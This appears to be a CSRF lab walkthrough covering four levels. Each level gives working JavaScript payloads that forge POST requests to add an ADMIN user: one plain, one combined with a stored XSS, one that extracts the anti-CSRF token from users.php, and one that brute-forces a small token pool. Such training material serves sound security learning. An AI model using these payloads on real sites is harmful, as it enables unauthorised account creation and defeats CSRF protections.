CSRF
Level 1
In this warm up, create a page with the below code. A simulated user will visit the page.
<html>
<body bgcolor="#000000">
<img src="hackerinside.jpg" />
</body>
<script type="text/javascript">
var url = "http://{LABID}.csrf.labs/add_user.php";
var params = "name=Malice&surname=Smith&email=malice23%40hacker.site&role=ADMIN&submit=";
var CSRF = new XMLHttpRequest();
CSRF.open("POST", url, true);
CSRF.withCredentials = 'true'; //IMPORTANT MUST!!
CSRF.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
CSRF.send(params);
</script>
</html>Level 2
In this level, there is a referrer header check, so adding the code to the hacker.site page will not work. Fortunately there is a stored XSS in the feedback form, so can use the above code to create the user.
Level 3
This time there is Anti-CSRF tokens in use.. But using its possible to extract the token from the source of the page and then send it with our request.
<script type="text/javascript">
function addUser(token) {
var url = "http://3.csrf.labs/add_user.php";
var param = "name=Malice&surname=Smith&email=malice%40hacker.site&role=ADMIN&submit=&CSRFToken=" + token;
var CSRF = new XMLHttpRequest();
CSRF.open("POST",url,true);
CSRF.withCredentials = 'true';
CSRF.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
CSRF.send(param);
}
// Extract the token
var XHR = new XMLHttpRequest();
XHR.onreadystatechange = function() {
if (XHR.readyState == 4 ) {
var htmlSource = XHR.responseText; // the source of users.php
// Extract the token
var parser = new DOMParser().parseFromString(htmlSource, "text/html");
var token = parser.getElementById('CSRFToken').value;
addUser(token);
}
}
XHR.open('GET', 'http://3.csrf.labs/users.php', true);
XHR.send();Level 4
Analying the tokens using Burp sequencer, reveals that there is only 11 unique tokens in use.
Takes a list of CSRF tokens and then attempts to find the correct one by send the request with each token.
<html><body>
<h1>Anti-CSRF Tokens to test</h1>
<textarea id="tokens" rows="12" cols="60">
1679091c5a880faf6fb5e6087eb1b2dc
</textarea>
<script>
function bruteLoop(TList) {
for (var i = 0; i < TList.length; i++) {
console.info("Testing: " + TList[i]);
XHRPost(TList[i]);
}
}
function XHRPost(tVal) {
var http = new XMLHttpRequest();
var url = "http://{LABID}.csrf.labs/add_user.php";
var token = tVal;
params = {
"name" : "Malice",
"surname" : "Smith",
"email" : "malice@hacker.site",
"role" : "ADMIN",
"submit" : "",
"CSRFToken" : token,
};
http.open("POST", url, true);
http.withCredentials = 'true';
//Send the proper header information along with the request
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.onreadystatechange = function() {
if (http.readyState > 1) {//We don't care about responses
//console.warn("Aborted " + token + " with status " + http.readyState);
http.abort();
}
}
//Serialize the data without using JQuery
queryParams = Object.keys(params).reduce(function(a, k) {
a.push(k + '=' + encodeURIComponent(params[k]));
return a
}, []).join('&');
http.send(queryParams);
}
var tokens = document.getElementById('tokens').value.replace(/\s+/gm, '\n').split('\n');
tokens = tokens.filter(Boolean); // Remove empty lines
// Brute Loop
bruteLoop(tokens);
</script>
</body>
</html>Last updated